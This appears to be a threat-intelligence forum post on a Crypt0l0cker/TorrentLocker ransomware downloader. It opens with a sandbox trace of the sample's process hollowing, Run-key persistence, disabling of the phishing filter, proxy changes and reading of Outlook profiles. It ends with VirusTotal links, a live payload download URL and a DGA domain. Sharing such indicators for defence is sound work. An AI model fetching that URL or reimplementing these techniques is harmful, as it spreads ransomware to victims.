Call Virtual Memory API API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 452000, , 512, 18f1ec ) Return: 1 2552 2644
Call Virtual Memory API API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 44c000, ., 10752, 18f1ec ) Return: 1 2552 2644
Call Virtual Memory API API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 412000, .., 235520, 18f1ec ) Return: 1 2552 2644
Call Virtual Memory API API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 401000, S...................8_A, 66048, 18f1ec ) Return: 1 2552 2644
Call Virtual Memory API API Name: WriteProcessMemory Args: ( Modify PEB 7efde000 Process:2840:%TEMP%\iqpaby.exe, 7efde008, , 4, 0 ) Return: 1 2552 2644
Call Thread API API Name: SetThreadContext Args: ( Process Name:2840:%TEMP%\iqpaby.exe ) Return: 1 2552 2644
Add File Path: %ALLUSERSPROFILE%\uwupefovygigylih\asiwahiz Type: VSDT_COM_DOS 2644 2840
Write File Path: %ALLUSERSPROFILE%\uwupefovygigylih\asiwahiz Type: VSDT_COM_DOS 2644 2840
Add File Path: %windir%\inubaslh.exe Type: VSDT_EXE_W32 2840 1204
Write File Path: %windir%\inubaslh.exe Type: VSDT_EXE_W32 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ahepoqog Value: "%windir%\inubaslh.exe" 2840 1204
Add File Path: %ALLUSERSPROFILE%\uwupefovygigylih\ebiwewiz Type: VSDT_COM_DOS 2840 1204
Write File Path: %ALLUSERSPROFILE%\uwupefovygigylih\ebiwewiz Type: VSDT_COM_DOS 2840 1204
Add File Path: %ALLUSERSPROFILE%\uwupefovygigylih\ewiwobiz Type: VSDT_COM_DOS 2840 1204
Write File Path: %ALLUSERSPROFILE%\uwupefovygigylih\ewiwobiz Type: VSDT_COM_DOS 2840 1204
Add Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\ Value: None 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\EnableFileTracing Value: 0 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\EnableConsoleTracing Value: 0 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\FileTracingMask Value: ffff0000 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\ConsoleTracingMask Value: ffff0000 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\MaxFileSize Value: 100000 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\FileDirectory Value: %windir%\tracing 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8 Value: 0 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 Value: 0 2840 1204
Add Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\ Value: None 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\EnableFileTracing Value: 0 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\EnableConsoleTracing Value: 0 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\FileTracingMask Value: ffff0000 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\ConsoleTracingMask Value: ffff0000 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\MaxFileSize Value: 100000 2840 1204
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\FileDirectory Value: %windir%\tracing 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable Value: 0 2840 1204
Delete Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer Value: None 2840 1204
Delete Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride Value: None 2840 1204
Delete Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL Value: None 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings Value: None 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\SOFTWARE\Classes\Local Settings\MuiCache\9B\52C64B7E\LanguageList Value: en-US\0en\0 2840 1204
Add File Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF 2840 1204
Add File Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS 2840 1204
Add File Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF 2840 1204
Write File Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF 2840 1204
Add File Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS 2840 1204
Write File Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS 2840 1204
Delete File Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF 2840 1204
Delete File Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS 2840 1204
Add File Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF 2840 1204
Add File Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS 2840 1204
Add File Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF 2840 1204
Write File Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF 2840 1204
Add File Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS 2840 1204
Write File Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS 2840 1204
Delete File Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF 2840 1204
Delete File Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS 2840 1204
Read Registry Key Key: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None 2840 1204
Read Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\ Value: None 2840 1204
Write File Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 Type: VSDT_MSCF 2840 1204
Write File Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 Type: VSDT_COM_DOS 2840 1204
Write File Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 Type: VSDT_COM_DOS 2840 1204
Add File Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF 2840 1204
Add File Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS 2840 1204
Add File Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF 2840 1204
Write File Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF 2840 1204
Add File Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS 2840 1204
Write File Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS 2840 1204
Delete File Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF 2840 1204
Delete File Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS 2840 1204
Write File Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 Type: VSDT_COM_DOS 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadDecisionReason Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadDecisionTime Value: None 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadDecision Value: 0 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadNetworkName Value: Network 6 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\94-00-fd-b0-24-82\WpadDecisionReason Value: 1 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\94-00-fd-b0-24-82\WpadDecisionTime Value: None 2840 1204
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\94-00-fd-b0-24-82\WpadDecision Value: 0 2840 1204
Add File Path: %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1C281L5S\plain[1].txt Type: VSDT_ASCII 2840 1204
Write File Path: %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1C281L5S\plain[1].txt Type: VSDT_ASCII 2840 1204
Delete File Path: %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1C281L5S\plain[1].txt Type: VSDT_ASCII 2840 1204ikolor wrote:next..#Crypt0l0cker #TorrentLocker #ransomware javascript downloader
https://www.virustotal.com/en/file/80de ... 488379920/
Download from:
http://saunabau.sk/index.pjkhttps://www.virustotal.com/en/file/5d47 ... /analysis/
DGA:
[...].poreved.netBR,
Antelox